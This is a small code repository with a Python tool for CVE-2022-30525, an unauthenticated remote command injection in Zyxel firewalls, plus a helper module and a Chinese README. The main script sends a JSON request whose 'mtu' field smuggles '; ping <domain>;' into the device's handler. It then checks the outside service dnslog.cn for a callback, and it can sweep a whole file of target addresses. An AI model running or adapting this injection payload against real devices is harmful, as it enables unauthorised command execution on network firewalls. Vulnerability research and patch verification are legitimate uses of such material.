├── ip.txt
├── dnslog.py
├── README.md
└── CVE-2022-30525.py


/ip.txt:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/dnslog.py:
--------------------------------------------------------------------------------
 1 | import random
 2 | import requests
 3 | 
 4 | res = requests.session()
 5 | 
 6 | 
 7 | def get_dnslog():
 8 |     t = random.random()
 9 |     url = f"http://www.dnslog.cn/getdomain.php?t={t}"
10 |     res1 = res.get(url=url)
11 |     if res1.status_code == 200 and "dnslog" in res1.text:
12 |         dnslog = res1.text
13 |         return dnslog
14 |     else:
15 |         print("获取dnslog失败")
16 | 
17 | 
18 | def get_data():
19 |     t = random.random()
20 |     url = f"http://www.dnslog.cn/getrecords.php?t={t}"
21 |     res2 = res.get(url=url)
22 |     return res2.text
23 | 
24 | 
25 | 
26 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2022-30525
 2 | Zyxel 防火墙远程命令注入漏洞（CVE-2022-30525）
 3 | 
 4 | 
 5 | # Optional Arguments:
 6 | 
 7 |   -h, --help            show this help message and exit
 8 |   
 9 |   -u url, --url url     Target url eg:"http://127.0.0.1"
10 |   
11 |   -f file, --file file  Targets in file eg:"ip.txt"
12 |   
13 | # Use
14 |   
15 | python3 CVE-2022-30525.py -u http://127.0.0.1
16 | 
17 | python3 CVE-2022-30525.py -f ip.txt
18 | 
19 | # Link
20 | https://www.henry4e36.top/index.php/archives/42.html
21 | 
22 | 
23 | # 参考
24 | https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
25 | 


--------------------------------------------------------------------------------
/CVE-2022-30525.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- conding:utf-8 -*-
 3 | import requests
 4 | import argparse
 5 | import sys
 6 | import urllib3
 7 | import json
 8 | import time
 9 | from dnslog import get_dnslog,get_data
10 | urllib3.disable_warnings()
11 | 
12 | 
13 | def title():
14 |     print("""
15 |   _____ __      __ ______          ___    ___   ___   ___           ____    ___   _____  ___   _____ 
16 |  / ____|\ \    / /|  ____|        |__ \  / _ \ |__ \ |__ \         |___ \  / _ \ | ____||__ \ | ____|
17 | | |      \ \  / / | |__    ______    ) || | | |   ) |   ) | ______   __) || | | || |__     ) || |__  
18 | | |       \ \/ /  |  __|  |______|  / / | | | |  / /   / / |______| |__ < | | | ||___ \   / / |___ \ 
19 | | |____    \  /   | |____          / /_ | |_| | / /_  / /_          ___) || |_| | ___) | / /_  ___) |
20 |  \_____|    \/    |______|        |____| \___/ |____||____|        |____/  \___/ |____/ |____||____/
21 |                                                                                                      
22 | 
23 |                                                                Author:Henry4E36
24 |                """)
25 | 
26 | class information(object):
27 |     def __init__(self,args):
28 |         self.args = args
29 |         self.url = args.url
30 |         self.file = args.file
31 | 
32 |     def target_url(self):
33 |         target_url = self.url + "/ztp/cgi-bin/handler"
34 |         headers = {
35 |             "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
36 |             "Content-Type": "application/json"
37 |         }
38 |         dnslog = get_dnslog()
39 |         data = {"command": "setWanPortSt", "proto": "dhcp", "port": "4", "vlan_tagged": "1", "vlanid": "5", "mtu": f"; ping {dnslog};", "data": "hi"}
40 |         try:
41 |             res = requests.post(url=target_url, headers=headers, data=json.dumps(data), verify=False, timeout=5)
42 |         except Exception as e:
43 |             pass
44 | 
45 |         time.sleep(5)
46 |         data = get_data()
47 |         if dnslog in data:
48 |             print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在Zyxel 防火墙未经身份验证的远程命令注入\033[0m")
49 |             print("[" + "-"*100 + "]")
50 |         else:
51 |             print(f"[\033[31mx\033[0m]  目标系统: {self.url} 不存在Zyxel 防火墙未经身份验证的远程命令注入！")
52 |             print("[" + "-"*100 + "]")
53 | 
54 |     def file_url(self):
55 |         with open(self.file, "r") as urls:
56 |             for url in urls:
57 |                 url = url.strip()
58 |                 if url[:4] != "http":
59 |                     url = "http://" + url
60 |                 self.url = url.strip()
61 |                 information.target_url(self)
62 | 
63 | 
64 | if __name__ == "__main__":
65 |     title()
66 |     parser = ar=argparse.ArgumentParser(description='Zyxel 防火墙未经身份验证的远程命令注入')
67 |     parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:\"http://127.0.0.1\"")
68 |     parser.add_argument("-f", "--file", metavar="file", help="Targets in file  eg:\"ip.txt\"")
69 |     args = parser.parse_args()
70 |     if len(sys.argv) != 3:
71 |         print(
72 |             "[-]  参数错误！\neg1:>>>python3 CVE-2022-30525.py -u http://127.0.0.1\neg2:>>>python3 CVE-2022-30525.py -f ip.txt")
73 |     elif args.url:
74 |         information(args).target_url()
75 | 
76 |     elif args.file:
77 |         information(args).file_url()
78 | 
79 | 


--------------------------------------------------------------------------------